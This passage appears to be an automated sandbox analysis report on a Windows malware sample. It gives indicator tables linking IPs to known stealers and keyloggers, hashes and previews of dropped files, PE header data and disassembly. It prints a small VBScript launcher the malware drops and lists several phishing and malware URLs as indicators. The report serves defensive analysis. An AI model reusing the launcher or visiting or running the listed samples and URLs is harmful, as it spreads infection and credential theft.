                                                                                                  • 132.226.247.73
                                                                                                  FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 158.101.44.242
                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  api.telegram.orgproforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                  • 149.154.167.220
                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                  • 149.154.167.220
                                                                                                  user.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  TELEGRAMRUproforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                  • 149.154.167.220
                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  http://t.me/hhackplusGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.99
                                                                                                  Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                  • 149.154.167.220
                                                                                                  user.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  CLOUDFLARENETUShttp://vwi46h7.terraclicks.click/rd/4fRUWo26099tRCA461sdwbdplppv232VXGPAFVAHBPJXIV321477KIEL571756p9Get hashmaliciousPhisherBrowse
                                                                                                  • 188.114.96.3
                                                                                                  http://wfs.SATSGroup.co/login.php?id=bmZlcmRpbmFuZG9Ad2ZzLmFlcm8=Get hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  https://url.uk.m.mimecastprotect.com/s/jiGQCnr5DH7GvmPu9fVSJcV9l?domain=wfs.satsgroup.coGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 104.21.53.168
                                                                                                  Selvi Payroll Benefits & Bonus Agreementfdp.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14
                                                                                                  https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fdeGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.25.14
                                                                                                  Your Google Account has been deleted due to Terms of Service violations.emlGet hashmaliciousUnknownBrowse
                                                                                                  • 1.1.1.1
                                                                                                  https://jmak-service.com/3225640388Get hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.25.14
                                                                                                  malw.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                  • 162.159.61.3
                                                                                                  UTMEMUSfatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 132.226.247.73
                                                                                                  Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 132.226.247.73
                                                                                                  miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 132.224.247.83
                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 132.226.247.73
                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 132.226.8.169
                                                                                                  armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 132.244.2.45
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adVSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 188.114.96.3
                                                                                                  document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 188.114.96.3
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ez.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                  • 149.154.167.220
                                                                                                  h.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                  • 149.154.167.220
                                                                                                  web55.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                  • 149.154.167.220
                                                                                                  atomxml.ps1Get hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exeGet hashmaliciousQuasarBrowse
                                                                                                  • 149.154.167.220
                                                                                                  proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  174.exeGet hashmaliciousXmrigBrowse
                                                                                                  • 149.154.167.220
                                                                                                  spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                  • 149.154.167.220
                                                                                                  invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  No context
                                                                                                  Process:C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):134442
                                                                                                  Entropy (8bit):7.924864044536228
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:OrND25zE7h63wXXNS/OY8ck+VN8JSx6788q+Iy43MTPyivzbVHuGRzjfsvfhgGWd:i2REAwtPn6N+Sx6788qzT0yiX0GNfsvK
                                                                                                  MD5:884AB737A204EF161698FDAD7840A501
                                                                                                  SHA1:CE0F30EAF16BC50B830E5AA1FDC152FEA71AB866
                                                                                                  SHA-256:25BC1C11D229C79CF6AD48554C8A8FEC5342D188DDC4D15FC67B7ABB95FD4875
                                                                                                  SHA-512:EFF270BD4C6B9EC75719A2E2641A89B7C55FFA807FE2C23C05A9F9456A766E1C3AA0738A3EB8F228AF3EC4AAF5A140E6139D7959CA838609A9F2F61AB9ED6E00
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:EA06..0..F....f.K..h.N.2.8.Q..9.B.T.Q*..56..4M@....8...fd.5....>.~....G=..U#..,.S/.^.3.%Jw%..*....Q,...Y5.Uw.J-..z.X.H*1..2et.N..W.....S....4kqS..k.[...[.SkT..,W.tY.B..hD* .D^.F..A...&..i.... ..l...)..{P..*s....G.......hv.l.Q ...f.K.V@:.imz.A.......\.L...v.2.G..;...(.@...H..,...^....'z.T.I/39..r.h.NW0.B..4S* ._...h......cP...2..L...................8.+4.^..F.l5...L....*...z.A...~@.^.Ku5....(.....X...Y.b..i.H..................,..N...... .N&`..........Bh.hR...t....Q.W..B.|..*..5.)*...>$.a3...tz.gcR..&.{...G.V....i0..g.DD./P..T....g.Vi.Y.>.4../...6.P..juI.~.g.S.V:m..I.D......G.R#w*.[eM.4a....kO.]..:]2.G.Tv5....I..5...........qz.....F.2.]g..mj.f....m..gA.......R@..?.....kUp..Z.R`..'P...*.V..._ls..j.I.MlvjT.....W.}......vI.6.M..6.:WA.U-.....L..;]..8.....L.o_.Pg.k...1._g.*%F.l....\.F..&t............. ..,.'...*.P.7...C..Ud...^.L..k4.l....L.{ ...2..*.*.V.;..N...&.O..N...b.7.U..(..D..n3ZM:=..a'...bd.._..J..._.Vi....j.pP..b.5.w.......V..m.&.0.Sv......hU......p..@..X.
                                                                                                  Process:C:\Users\user\Desktop\oagkiAhXgZ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):134442
                                                                                                  Entropy (8bit):7.924864044536228
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:OrND25zE7h63wXXNS/OY8ck+VN8JSx6788q+Iy43MTPyivzbVHuGRzjfsvfhgGWd:i2REAwtPn6N+Sx6788qzT0yiX0GNfsvK
                                                                                                  MD5:884AB737A204EF161698FDAD7840A501
                                                                                                  SHA1:CE0F30EAF16BC50B830E5AA1FDC152FEA71AB866
                                                                                                  SHA-256:25BC1C11D229C79CF6AD48554C8A8FEC5342D188DDC4D15FC67B7ABB95FD4875
                                                                                                  SHA-512:EFF270BD4C6B9EC75719A2E2641A89B7C55FFA807FE2C23C05A9F9456A766E1C3AA0738A3EB8F228AF3EC4AAF5A140E6139D7959CA838609A9F2F61AB9ED6E00
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:EA06..0..F....f.K..h.N.2.8.Q..9.B.T.Q*..56..4M@....8...fd.5....>.~....G=..U#..,.S/.^.3.%Jw%..*....Q,...Y5.Uw.J-..z.X.H*1..2et.N..W.....S....4kqS..k.[...[.SkT..,W.tY.B..hD* .D^.F..A...&..i.... ..l...)..{P..*s....G.......hv.l.Q ...f.K.V@:.imz.A.......\.L...v.2.G..;...(.@...H..,...^....'z.T.I/39..r.h.NW0.B..4S* ._...h......cP...2..L...................8.+4.^..F.l5...L....*...z.A...~@.^.Ku5....(.....X...Y.b..i.H..................,..N...... .N&`..........Bh.hR...t....Q.W..B.|..*..5.)*...>$.a3...tz.gcR..&.{...G.V....i0..g.DD./P..T....g.Vi.Y.>.4../...6.P..juI.~.g.S.V:m..I.D......G.R#w*.[eM.4a....kO.]..:]2.G.Tv5....I..5...........qz.....F.2.]g..mj.f....m..gA.......R@..?.....kUp..Z.R`..'P...*.V..._ls..j.I.MlvjT.....W.}......vI.6.M..6.:WA.U-.....L..;]..8.....L.o_.Pg.k...1._g.*%F.l....\.F..&t............. ..,.'...*.P.7...C..Ud...^.L..k4.l....L.{ ...2..*.*.V.;..N...&.O..N...b.7.U..(..D..n3ZM:=..a'...bd.._..J..._.Vi....j.pP..b.5.w.......V..m.&.0.Sv......hU......p..@..X.
                                                                                                  Process:C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):134442
                                                                                                  Entropy (8bit):7.924864044536228
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:OrND25zE7h63wXXNS/OY8ck+VN8JSx6788q+Iy43MTPyivzbVHuGRzjfsvfhgGWd:i2REAwtPn6N+Sx6788qzT0yiX0GNfsvK
                                                                                                  MD5:884AB737A204EF161698FDAD7840A501
                                                                                                  SHA1:CE0F30EAF16BC50B830E5AA1FDC152FEA71AB866
                                                                                                  SHA-256:25BC1C11D229C79CF6AD48554C8A8FEC5342D188DDC4D15FC67B7ABB95FD4875
                                                                                                  SHA-512:EFF270BD4C6B9EC75719A2E2641A89B7C55FFA807FE2C23C05A9F9456A766E1C3AA0738A3EB8F228AF3EC4AAF5A140E6139D7959CA838609A9F2F61AB9ED6E00
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:EA06..0..F....f.K..h.N.2.8.Q..9.B.T.Q*..56..4M@....8...fd.5....>.~....G=..U#..,.S/.^.3.%Jw%..*....Q,...Y5.Uw.J-..z.X.H*1..2et.N..W.....S....4kqS..k.[...[.SkT..,W.tY.B..hD* .D^.F..A...&..i.... ..l...)..{P..*s....G.......hv.l.Q ...f.K.V@:.imz.A.......\.L...v.2.G..;...(.@...H..,...^....'z.T.I/39..r.h.NW0.B..4S* ._...h......cP...2..L...................8.+4.^..F.l5...L....*...z.A...~@.^.Ku5....(.....X...Y.b..i.H..................,..N...... .N&`..........Bh.hR...t....Q.W..B.|..*..5.)*...>$.a3...tz.gcR..&.{...G.V....i0..g.DD./P..T....g.Vi.Y.>.4../...6.P..juI.~.g.S.V:m..I.D......G.R#w*.[eM.4a....kO.]..:]2.G.Tv5....I..5...........qz.....F.2.]g..mj.f....m..gA.......R@..?.....kUp..Z.R`..'P...*.V..._ls..j.I.MlvjT.....W.}......vI.6.M..6.:WA.U-.....L..;]..8.....L.o_.Pg.k...1._g.*%F.l....\.F..&t............. ..,.'...*.P.7...C..Ud...^.L..k4.l....L.{ ...2..*.*.V.;..N...&.O..N...b.7.U..(..D..n3ZM:=..a'...bd.._..J..._.Vi....j.pP..b.5.w.......V..m.&.0.Sv......hU......p..@..X.
                                                                                                  Process:C:\Users\user\Desktop\oagkiAhXgZ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):274432
                                                                                                  Entropy (8bit):6.901271681873877
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:qaoeH4fwPt9hKDiiaKC6dLewqUYCG1GJZLZwx7P7gjCQpxlI:qQekbQFKGJZCz7gjCQu
                                                                                                  MD5:F981D2D45995304B8076B4F0E583862B
                                                                                                  SHA1:76D4483836ECD73B0996350D6F1C5626C2C06B9C
                                                                                                  SHA-256:0D75BD58502E3259A0D45A61086CB7658EB24B747A3FCD5749BD5C47AB89828A
                                                                                                  SHA-512:1ED0C1FC6AFD04769A08956D04FE772CC0FB84EF7B1D766127DDD6EC707B4DDBAA25BB9973DF8CEC114CAA29FE2223ECB4E02D5642A8F7682CAE837DB78D59BE
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:...MYYMK1ID4..A8.GXS1PUTrDWAFMZYMK5ID403A8PGXS1PUT2DWAFMZYMK.ID4>,.6P.Q...T..e.)/>z)?$R;%Y.P V>(,sS5u&G*w((m...kX& Q.>L2tGXS1PUTb.WA.LYY../D403A8PG.S3Q^UbDW[BMZMMK5ID4^.E8PgXS1.QT2D.AFmZYMI5I@403A8PG\S1PUT2DW.BMZ[MK5ID423..PGHS1@UT2DGAF]ZYMK5IT403A8PGXS1PMl6D.AFMZ.IK"YD403A8PGXS1PUT2DWAF-^YAK5ID403A8PGXS1PUT2DWAFMZYMK5ID403A8PGXS1PUT2DWAFMZYMk5IL403A8PGXS1P]t2D.AFMZYMK5ID4.G$@$GXSEHQT2dWAFW^YMI5ID403A8PGXS1PuT2$y35?9YMK"YD40sE8PUXS1LQT2DWAFMZYMK5I.40soJ5+701PYT2DW!BMZ[MK5g@403A8PGXS1PUTrDW.FMZYMK5ID403A8PG.k5PUT2D.AFMXYHK..F4..@8SGXS.PUR..UA.MZYMK5ID403A8PGXS1PUT2DWAFMZYMK5ID403A8PGXS.-.[...(5.YMK5ID520E>XOXS1PUT2D)AFM.YMKuID4.3A8uGXS\PUT.DWA8MZY3K5I 40338PG9S1P.T2D8AFM4YMKKID4.1i.PGRy.PW|.DWKFg.*oK5C.503EKsGXY.RUT67sAFG.ZMK1:a409.<PG\ .PU^.AWABg.YN.#OD4+\x8PMXP.EST2_}gFOrcMK?In.00.-VGXH.rUV.MWABg.*PK5Olw03KLYGXQ.ZUT6nICn.ZYGa.7O407j8ze&_1PQ.2nu?KMZ]fK.WF.=3A<ze&]1PQ.2nu?IMZ]fK.WF.?3A<ze&C1PQ.2nu?WMZ]fK.k:&03E.Pmz-"PUP.D}c8YZYI`5cfJ%3A<{GrqOFUT6oWkd3MYMO.In.N+A8TlXy/R.L2DSk@g8Y?. I47
                                                                                                  Process:C:\Users\user\Desktop\oagkiAhXgZ.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1111040
                                                                                                  Entropy (8bit):6.970676610649293
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8aeMExfQ:9TvC/MTQYxsWR7aeMk
                                                                                                  MD5:EB8C8ACAE9D3A669129902384F5335B2
                                                                                                  SHA1:F0F9AA5F20C2721EACC7E2B660C46B585B653EE2
                                                                                                  SHA-256:FEF805CFE8DF23B5E42E59C3505BA7B9014C2CF3E9AC9346B3BADBA3C086053C
                                                                                                  SHA-512:5C62016F2B7B6FBFDBA82539EFFC1C9DD65E0A3BC0DF92210637D500562CFAE01572866578A57D080C3247433DA0F5845688ADEF74FD7467D08C7BA564C74FA3
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                  Reputation:low
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...3.`g.........."..........D......w.............@..........................P............@...@.......@.....................d...|....@..........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc.......@......................@..@.reloc...u.......v...~..............@..B........................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):286
                                                                                                  Entropy (8bit):3.4100990617315317
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX105WlMhwrCaaB6nriIM8lfQVn:DsO+vNlzQ105Weh4mA2n
                                                                                                  MD5:29AA78045A295D01FADB84CF54724F93
                                                                                                  SHA1:A80C8764B5708AE600F277BCD9B5E78F811510BF
                                                                                                  SHA-256:E383458BE970661EBC4177099670F16F05F25C9DEBF42D7BEBA3410F716916D8
                                                                                                  SHA-512:941317B225C70CEC7ED78538A37491E9F06931E9058B7A4C65418994A57876E298AE8482260C9489F574E3855CDAB687DBE27BE902F23A801E8446338A1C8B53
                                                                                                  Malicious:true
                                                                                                  Reputation:low
                                                                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.h.e.b.e.s.i.a.n.\.r.e.i.n.d.u.l.g.e.n.c.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):6.970676610649293
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:oagkiAhXgZ.exe
                                                                                                  File size:1'111'040 bytes
                                                                                                  MD5:eb8c8acae9d3a669129902384f5335b2
                                                                                                  SHA1:f0f9aa5f20c2721eacc7e2b660c46b585b653ee2
                                                                                                  SHA256:fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c
                                                                                                  SHA512:5c62016f2b7b6fbfdba82539effc1c9dd65e0a3bc0df92210637d500562cfae01572866578a57d080c3247433da0f5845688adef74fd7467d08c7ba564c74fa3
                                                                                                  SSDEEP:24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8aeMExfQ:9TvC/MTQYxsWR7aeMk
                                                                                                  TLSH:1635AE027391C072FF9B91334B5AF76146BCAD260123A51F13982DBABE701B1567E7A3
                                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                  Icon Hash:74f0d4d4d4d4d4cc
                                                                                                  Entrypoint:0x420577
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6760BA33 [Mon Dec 16 23:39:31 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                                  Instruction
                                                                                                  call 00007F4364BFFC53h
                                                                                                  jmp 00007F4364BFF55Fh
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007F4364BFF73Dh
                                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                                  ret
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007F4364BFF70Ah
                                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                                  ret
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                  and dword ptr [eax], 00000000h
                                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                                  push eax
                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                  add eax, 04h
                                                                                                  push eax
                                                                                                  call 00007F4364C022FDh
                                                                                                  pop ecx
                                                                                                  pop ecx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                                  push eax
                                                                                                  call 00007F4364C02348h
                                                                                                  pop ecx
                                                                                                  ret
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                                  push eax
                                                                                                  call 00007F4364C02331h
                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                  pop ecx
                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x388e4.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x10d0000x7594.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
